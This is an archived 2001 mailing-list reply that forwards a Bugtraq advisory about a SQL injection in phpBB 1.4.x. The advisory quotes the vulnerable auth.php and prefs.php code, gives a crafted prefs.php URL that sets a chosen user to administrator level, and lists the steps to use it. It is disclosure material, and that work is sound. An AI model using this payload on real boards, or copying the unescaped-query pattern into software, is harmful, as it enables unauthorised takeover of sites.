[thelist] phpBB ?

Jeremy Ashcraft ashcraft at 13monkeys.com
Wed Aug 8 16:55:41 CDT 2001 

On Wednesday 08 August 2001 15:02, you wrote:
> OK, so now you've got me concerned. We've been using phpBB since about May.
> Our visitors and our staff all think it's just too complicated for most
> users, so it's been a Priority3 item for getting a new one.
>
> So if you can, please define "very large security hole".

This is what popped up on the bugtraq mailing list about it.  Another post 
verified this hole in phpBB1.2.1 also.  Looks like a big hole to me..... 

-----Original Message-----
From: kill-9 at modernhackers.com [mailto:kill-9 at modernhackers.com]
Sent: Friday, August 03, 2001 2:51 PM
To: bugtraq at securityfocus.com
Subject: phpBB 1.4.0 bug leads to easy admin privileges


-New phpBB 1.4.x exploit
phpBB, is an open source bulletin board created by 
the 
phpBB group. Version 1.4.x of phpBB has a variable 
input 
validation problem that can lead to limited arbitrary sql 
querys including gaining administrative access to the 
board.

The problem lies in the fact that phpBB 1.4.x includes 
an 
algorithm in the auth.php file which removes 
backslashes 
that php automatically adds to GPC 
(Get/Post/Cookie) 
variables.

<Example code from auth.php>

if(get_magic_quotes_gpc() == 1)
{
switch($REQUEST_METHOD){
   case "POST":
      while (list ($key, $val) = each 
($HTTP_POST_VARS)){
         if( is_array($val) ){
            array_walk($val, 'stripslashes_array', '');
            $$key = $val;}
      else{
         $$key = stripslashes($val);}
      }
   break;

</ End example code>


Therefore, certian php variables submitted through a 
URL
can reach an sql query with unescaped quotes, 
which is 
not good for security reasons. In the prefs.php file 
such
a situation exists where a user can execute an 
arbitrary
query by supplying an certian value for the 
$viewemail 
variable.

< Example sql query in prefs.php >
$sql = "UPDATE users SET 
user_viewemail='$viewemail', 
user_theme='$themes', user_attachsig = '$sig', 
user_desmile = '$smile', user_html = '$dishtml', 
user_bbcode
 = '$disbbcode', user_lang = '$lang' WHERE 
(user_id = '$userdata[user_id]')";
</ End example code >


Example URL gives a username "l337h4x0r" level 4 
(administrative) privileges the board:

<Example URL>

http://sitename/phpBBfolder/prefs.php?save=1
&viewemail=1',user_level%3D'4'%20where%
20username%3D'l337h4x0r'%23

</ End example URL>

Summary:

1. Register an account on a phpBB board version 
1.4.x .
2. Enter above URL with the correct sitename 
   and replace l337h4x0r with your username.
3. Click on "Administration Panel" near the bottom of 
the page.

found by: kill-9 at modernhacker.com
http://www.modernhacker.com

More information about the thelist mailing list